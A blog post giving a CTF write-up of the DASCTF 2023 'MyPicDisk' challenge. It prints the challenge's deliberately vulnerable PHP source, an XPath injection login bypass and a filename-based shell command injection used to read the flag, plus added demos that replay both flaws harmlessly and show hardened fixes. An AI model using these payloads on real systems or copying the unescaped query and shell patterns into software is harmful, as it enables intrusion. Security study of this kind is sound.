lazy_forever's Blog

[DASCTF 2023 & 0X401 July Summer Challenge] MyPicDisk
lazy_forever · 2023-07-27 · via lazy_forever's Blog

Walkthrough

Start the container. It presents a login form (username and password) whose fields are submitted via POST.

Log in with a generic XPath injection payload (the submit value is the URL-encoded button label 登录):

username=admin'&password=']|//*|//*['&submit=%E7%99%BB%E5%BD%95

The injection succeeds. Inspecting the response in Burp shows an HTML comment hinting at the source archive: /y0u_cant_find_1t.zip

This yields the source:

<?php
session_start();
error_reporting(0);
class FILE
{
public $filename;
public $lasttime;
public $size;
public function __construct($filename)
{
if (preg_match("/\//i", $filename)) { // reject any "/"
throw new Error("hacker!");
}
$num = substr_count($filename, ".");
if ($num != 1) { // exactly one "."
throw new Error("hacker!");
}
if (!is_file($filename)) { // must already exist relative to the script's directory
throw new Error("???");
}
$this->filename = $filename;
$this->size = filesize($filename);
$this->lasttime = filemtime($filename);
}
public function remove()
{
unlink($this->filename);
}
public function show()
{
echo "Filename: " . $this->filename . " Last Modified Time: " . $this->lasttime . " Filesize: " . $this->size . "<br>";
}
public function __destruct()
{
// filename is concatenated into a shell command without escapeshellarg()
system("ls -all " . $this->filename);
}
}
?>
<!DOCTYPE html>
<html>

<head>
<meta charset="UTF-8">
<title>MyPicDisk</title>
</head>

<body>
<?php
if (!isset($_SESSION['user'])) {
echo '
<form method="POST">
username:<input type="text" name="username"></p>
password:<input type="password" name="password"></p>
<input type="submit" value="登录" name="submit"></p>
</form>
';
$xml = simplexml_load_file('/tmp/secret.xml');
if ($_POST['submit']) {
$username = $_POST['username'];
$password = md5($_POST['password']);
// username is interpolated raw into the XPath expression; only the password is hashed
$x_query = "/accounts/user[username='{$username}' and password='{$password}']";
$result = $xml->xpath($x_query);
if (count($result) == 0) {
echo '登录失败';
} else {
$_SESSION['user'] = $username;
echo "<script>alert('登录成功!');location.href='/index.php';</script>";
}
}
} else {
if ($_SESSION['user'] !== 'admin') {
echo "<script>alert('you are not admin!!!!!');</script>";
unset($_SESSION['user']);
echo "<script>location.href='/index.php';</script>";
// no exit(): the listing, upload handler and ?file= handling below still run
}
echo "<!-- /y0u_cant_find_1t.zip -->";
if (!$_GET['file']) {
foreach (scandir(".") as $filename) {
if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
}
}
echo '
<form action="index.php" method="post" enctype="multipart/form-data">
选择图片:<input type="file" name="file" id="">
<input type="submit" value="上传"></form>
';
if ($_FILES['file']) {
$filename = $_FILES['file']['name'];
// extension whitelist only; note the unescaped "." in the pattern
if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
die("hacker!");
}
if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)) {
echo "<script>alert('图片上传成功!');location.href='/index.php';</script>";
} else {
die('failed');
}
}
} else {
$filename = $_GET['file'];
if ($_GET['todo'] === "md5") {
// md5_file() goes through PHP stream wrappers (the md5_file + phar route mentioned in the afterword)
echo md5_file($filename);
} else {
$file = new FILE($filename);
if ($_GET['todo'] !== "remove" && $_GET['todo'] !== "show") {
echo "<img src='../" . $filename . "'><br>";
echo "<a href='../index.php/?file=" . $filename . "&&todo=remove'>remove</a><br>";
echo "<a href='../index.php/?file=" . $filename . "&&todo=show'>show</a><br>";
} else if ($_GET['todo'] === "remove") {
$file->remove();
echo "<script>alert('图片已删除!');location.href='/index.php';</script>";
} else if ($_GET['todo'] === "show") {
$file->show();
}
}
}
}
?>
</body>

</html>

Analysing the source: uploads are restricted by an extension whitelist (jpg|jpeg|gif|png|bmp).

Further down, class FILE's __destruct() calls system("ls -all " . $this->filename), so the filename is concatenated straight into a shell command.

There are conditions, though: the filename must contain exactly one "." and no "/", and is_file() must succeed, so the file has to exist in the web root before a FILE object can be built for it. Note also that the "you are not admin" branch only unsets the session and never exits, so the listing, the upload handler and the ?file= handling still run in that request.

Next, find a way around those conditions.

First upload a file named 1111.jpg whose content is ls /, to list the root directory and find the flag's filename.

Then upload a file named ;`cat 111*`;1.jpg and request ?file=;`cat 111*`;1.jpg&todo=show. The command runs, and the response contains the root listing with the flag file adjaskdhnask_flag_is_here_dakjdnmsakjnfksd.

Finally change the content of 1111.jpg to cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd, upload it again, and trigger the command once more to get the flag.

How it works

XPath injection

After interpolation the XPath query is (the password field is passed through md5() before it reaches the query, so the `']|//*|//*['` tail never appears literally):

/accounts/user[username='admin'' and password='<md5 of the password field>']

One might expect the quote after admin to close the predicate and the rest to be ignored, as if the query were

/accounts/user[username='admin']

i.e. a check for whether an admin account exists. That is not quite what happens. The stray quote leaves the predicate malformed, libxml2 rejects the expression, and SimpleXMLElement::xpath() returns false instead of a node list. error_reporting(0) hides the warning, and on PHP 7 count(false) evaluates to 1, so count($result) == 0 is false and the login goes through (on PHP 8 count(false) throws a TypeError, so the successful login implies the challenge ran PHP 7). The practical result is the one the walkthrough relies on: any username containing a quote bypasses the credential check, and $_SESSION['user'] is set to that username, here admin'.
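An added example, written for this edit rather than taken from the write-up or the challenge, that replays the login query against a constructed secret.xml, shows why the walkthrough's payload yields a malformed expression, adds a syntactically valid XPath injection of the same shape for comparison, and a hardened check. The XML contents, md5("admin") as the stored hash, and the function names are assumptions made for the demo:

```php
<?php
// Added example, not part of the original write-up: replays the challenge's
// login query against a constructed secret.xml (contents made up here) to
// show what the walkthrough's payload really produces, plus a hardened check.
$secret = <<<XML
<accounts>
  <user>
    <username>admin</username>
    <password>21232f297a57a5a743894a0e4a801fc3</password> <!-- md5("admin") -->
  </user>
</accounts>
XML;
$xml = simplexml_load_string($secret);

// Same construction as the challenge: raw username, md5() of the password.
function buildQuery(string $username, string $password): string
{
    return "/accounts/user[username='{$username}' and password='" . md5($password) . "']";
}

// Vulnerable check, with the PHP 7 count() quirk made explicit: xpath()
// returns false for a malformed expression, and on PHP 7 count(false) is 1,
// so the challenge's "count($result) == 0" test passes the login.
function vulnerableLogin(SimpleXMLElement $xml, string $username, string $password): bool
{
    $result = @$xml->xpath(buildQuery($username, $password)); // @ mirrors error_reporting(0)
    if ($result === false) {
        return PHP_MAJOR_VERSION < 8;   // PHP 8: count(false) throws TypeError instead
    }
    return count($result) > 0;
}

// Hardened: whitelist the username so it cannot carry quotes or XPath syntax,
// look the user up by name only, and compare the hash in PHP (constant time).
function safeLogin(SimpleXMLElement $xml, string $username, string $password): bool
{
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $username)) {
        return false;
    }
    $nodes = $xml->xpath("/accounts/user[username='{$username}']");
    if ($nodes === false || count($nodes) !== 1) {
        return false;
    }
    return hash_equals((string) $nodes[0]->password, md5($password));
}

// 1. The walkthrough's payload: the password tail is neutralised by md5(), and
//    the stray quote leaves an unterminated predicate => xpath() returns false.
echo buildQuery("admin'", "']|//*|//*['"), "\n";
var_dump(vulnerableLogin($xml, "admin'", "']|//*|//*['"));    // true on PHP 7, false on 8

// 2. A syntactically valid injection against the same query (textbook XPath
//    injection, not the payload the write-up used): "and" binds tighter than
//    "or", so the password clause is bypassed on any PHP version.
var_dump(vulnerableLogin($xml, "admin' or '1'='1", "whatever")); // true

// 3. Both are rejected by the hardened check; the real credential still works.
var_dump(safeLogin($xml, "admin'", "']|//*|//*['"));           // false
var_dump(safeLogin($xml, "admin' or '1'='1", "whatever"));     // false
var_dump(safeLogin($xml, "admin", "admin"));                    // true
```

Run it with `php` from the command line. SimpleXML offers no parameter binding for XPath, so the fix is to keep untrusted text out of the expression entirely (whitelist the name) and do the secret comparison in PHP rather than inside the query.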

RCE

; separates commands on a single shell line.

In Linux shells a command in backticks is run first and its standard output is substituted into the command line at that position; the shell then word-splits the result and executes it as a command. Here `cat 111*` turns the body of the uploaded 1111.jpg into the command that runs. Because the substituted text is only word-split (not re-parsed for operators), the body must be a simple command: pipes, redirects and quoting inside it are not interpreted.
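An added example, written for this edit rather than taken from the write-up or the challenge, that re-implements FILE's filename checks and the ls -all command line in a throw-away directory, runs the filename trick from the walkthrough with a harmless command body in place of ls /, and shows the escapeshellarg() fix. The directory, the file bodies and the function names are constructed for the demo:

```php
<?php
// Added example, not part of the original write-up: re-implements the FILE
// constructor's filename rules and the "ls -all" shell line from the
// challenge inside a scratch directory, runs the walkthrough's filename
// trick with a harmless command body, and shows the escapeshellarg() fix.
// The scratch directory and file bodies are constructed for this demo.

// The three checks from FILE::__construct as a standalone predicate.
function passesFileChecks(string $filename): bool
{
    if (preg_match("/\//i", $filename)) {      // no "/" => no path component
        return false;
    }
    if (substr_count($filename, ".") != 1) {   // exactly one "."
        return false;
    }
    return is_file($filename);                 // must already exist (hence the upload)
}

// Vulnerable: the command line __destruct() builds. shell_exec() is used
// instead of system() only so the output can be returned and inspected.
function listVulnerable(string $filename): string
{
    return (string) shell_exec("ls -all " . $filename);
}

// Hardened: whitelist the name first, then quote it so the shell receives
// one literal word whatever characters survived.
function listSafe(string $filename): string
{
    if (!preg_match('/^[A-Za-z0-9_-]+\.(jpg|jpeg|gif|png|bmp)$/i', $filename)) {
        throw new Error("hacker!");
    }
    return (string) shell_exec("ls -all " . escapeshellarg($filename));
}

// --- scratch directory standing in for the web root ---
$dir = sys_get_temp_dir() . "/mypicdisk_" . bin2hex(random_bytes(4));
mkdir($dir);
chdir($dir);

// Step 1 of the walkthrough: upload an "image" whose body is the command to
// run. `cat 111*` substitutes that body into the command line, so the body is
// word-split and executed as a simple command: no pipes, redirects or quoting.
file_put_contents("1111.jpg", "echo injected-command-ran");

// Step 2: a second upload whose *name* is the injection. ";" ends ls -all,
// the backticks run cat 111*, and ";1.jpg" supplies the single required dot.
$evil = ";`cat 111*`;1.jpg";
touch($evil);

var_dump(passesFileChecks($evil));                       // bool(true)
echo "shell sees: ls -all " . $evil . "\n";               // ls -all ;`cat 111*`;1.jpg

$out = listVulnerable($evil);
var_dump(strpos($out, "injected-command-ran") !== false); // bool(true)
// ("1.jpg: not found" goes to stderr and is not part of $out.)

try {
    listSafe($evil);                                     // rejected before any shell runs
} catch (Error $e) {
    echo $e->getMessage(), "\n";                         // hacker!
}
echo listSafe("1111.jpg");                               // one quoted argument => just that file

// Cleanup.
unlink("1111.jpg");
unlink($evil);
chdir(sys_get_temp_dir());
rmdir($dir);
```

Run it with `php` from the command line. The body of 1111.jpg is word-split and executed as one simple command, which is why the walkthrough's ls / and cat /<flag file> bodies work and why a body containing a pipe or redirect would not; the hardened version never lets the shell see the name unquoted, and the whitelist also closes the "exactly one dot, no slash" loophole that the original checks left open.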

Afterword

After reading many write-ups online, it seems my approach was an unintended solution.

The intended solution uses the md5_file() function combined with phar.

I'm really bad at this. Why no write-ups for the other challenges? Because I couldn't solve any of them...